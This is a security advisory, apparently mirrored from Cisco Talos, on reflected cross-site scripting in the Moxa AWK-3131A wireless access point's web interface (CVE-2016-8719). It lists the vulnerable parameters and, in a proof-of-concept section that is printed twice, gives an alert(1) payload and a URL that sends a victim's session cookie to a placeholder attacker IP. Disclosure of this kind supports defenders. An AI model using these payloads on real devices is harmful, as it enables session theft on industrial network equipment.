Lucene search

K
seebugRootSSV:96533
HistorySep 19, 2017 - 12:00 a.m.

Moxa AWK-3131A Web Application Multiple Reflected Cross-Site Scripting Vulnerabilities(CVE-2016-8719)

2017-09-1900:00:00
Root
www.seebug.org
31

0.001 Low

EPSS

Percentile

43.5%

Summary

An exploitable reflected Cross-Site Scripting vulnerability exists in the Web Application functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. Specially crafted input, in multiple parameters, can cause a malicious scripts to be executed by a victim.

Tested Versions

Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client 1.1

Product URLs

http://www.moxa.com/product/AWK-3131A.htm

CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Details

An exploitable Reflected Cross-Site Scripting (XSS) vulnerability exists in the Web Application functionality of Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client. Specially crafted input, in multiple parameters, can cause a malicious scripts to be executed by a victim.

The following parameters have been validated as being vulnerable to XSS exploitation: - devIndex parameter in clientlist.asp - devIndex parameter in multiplessidset.asp - index parameter in wirelesscert.asp - vapIndex parameter in wireless_security.asp

In testing, it was possible to inject JavaScript which allowed an attacker to steal legitimate session tokens, allowing the attacker to impersonate an authenticated user.

Exploit Proof-of-Concept

Basic PoC In multiplessidset.asp, devIndex parameter, JavaScript preceded by "; and closed with %2f%2f

";alert(1)%2f%2f

Stealing Session Tokens The URL below will send an authenticated user’s valid session token to the attacker:

http://<device IP>//wireless_cert.asp?index=?index=%22%3E%3Cscript%3Ewindow.location=%22http://<attacker IP>/test?cookie=%22.concat%28document.cookie%29%3C/script%3E

Mitigation

To significantly mitigate risk of exploitation, disable the web application before the device is deployed.

Timeline

  • 2016-11-14 - Vendor Disclosure
  • 2017-04-10 - Public Release

CREDIT

  • Discovered by Patrick DeSantis of Cisco Talos.

                                                Basic PoC In multiplessidset.asp, devIndex parameter, JavaScript preceded by "; and closed with %2f%2f
";alert(1)%2f%2f

Stealing Session Tokens The URL below will send an authenticated user's valid session token to the attacker:
http://<device IP>//wireless_cert.asp?index=?index=%22%3E%3Cscript%3Ewindow.location=%22http://<attacker IP>/test?cookie=%22.concat%28document.cookie%29%3C/script%3E
                              

0.001 Low

EPSS

Percentile

43.5%